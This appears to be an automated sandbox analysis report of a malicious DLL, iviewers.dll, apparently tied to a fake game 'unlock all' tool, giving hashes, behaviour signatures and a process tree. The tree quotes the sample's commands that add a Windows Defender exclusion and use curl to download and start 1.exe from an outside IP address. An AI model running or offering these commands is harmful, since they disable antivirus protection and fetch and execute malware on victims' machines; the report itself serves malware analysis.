Analysis
-
max time kernel
88s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
16/03/2025, 10:36
Static task
static1
Behavioral task
behavioral1
Sample
Warzone_Unlock_All_Tool.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral2
Sample
iviewers.dll
Resource
win7-20240729-en
General
-
Target
iviewers.dll
-
Size
83KB
-
MD5
5649b671dabb89dd275575188cd9bf51
-
SHA1
25f3dbb4fe5c13ea06a43efd8abae7bfd6c0e05c
-
SHA256
c5c48516e26cd796404e77b9275a976ec4b4f75a70e04ff7781203ee5da59cc1
-
SHA512
74e5f13719eba0e5fa2750225bcced7a40bb48a02d6df693cd70141219707fb5392851128bff7d0fbb9e471e414e9bd0a34deda2e9de4e9fd456d390374790fc
-
SSDEEP
1536:ybo5eK+wzZQ1LRC7ivPv8ZqTfXeqvz+NBGQS18sWpcdVQ/LHWeDCf7/P/:ys5tXVQLRC7iv4qTvcGQS1VQ/jWeDCfb
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2684 powershell.exe -
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2684 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2684 powershell.exe -
Suspicious use of WriteProcessMemory 19 IoCs
description pid Process procid_target PID 2668 wrote to memory of 2760 2668 regsvr32.exe 30 PID 2668 wrote to memory of 2760 2668 regsvr32.exe 30 PID 2668 wrote to memory of 2760 2668 regsvr32.exe 30 PID 2668 wrote to memory of 2760 2668 regsvr32.exe 30 PID 2668 wrote to memory of 2760 2668 regsvr32.exe 30 PID 2668 wrote to memory of 2760 2668 regsvr32.exe 30 PID 2668 wrote to memory of 2760 2668 regsvr32.exe 30 PID 2760 wrote to memory of 2764 2760 regsvr32.exe 31 PID 2760 wrote to memory of 2764 2760 regsvr32.exe 31 PID 2760 wrote to memory of 2764 2760 regsvr32.exe 31 PID 2760 wrote to memory of 2764 2760 regsvr32.exe 31 PID 2764 wrote to memory of 2684 2764 cmd.exe 33 PID 2764 wrote to memory of 2684 2764 cmd.exe 33 PID 2764 wrote to memory of 2684 2764 cmd.exe 33 PID 2764 wrote to memory of 2684 2764 cmd.exe 33 PID 2760 wrote to memory of 2868 2760 regsvr32.exe 34 PID 2760 wrote to memory of 2868 2760 regsvr32.exe 34 PID 2760 wrote to memory of 2868 2760 regsvr32.exe 34 PID 2760 wrote to memory of 2868 2760 regsvr32.exe 34
Processes
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\iviewers.dll1⤵
- Suspicious use of WriteProcessMemory
PID:2668 -
C:\Windows\SysWOW64\regsvr32.exe/s C:\Users\Admin\AppData\Local\Temp\iviewers.dll2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2760 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp\1.exe'"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2764 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp\1.exe'"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2684
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cd C:\Windows\Temp\ & curl -o 1.exe http://147.45.44.170/1.exe & start 1.exe3⤵
- System Location Discovery: System Language Discovery
PID:2868
-
-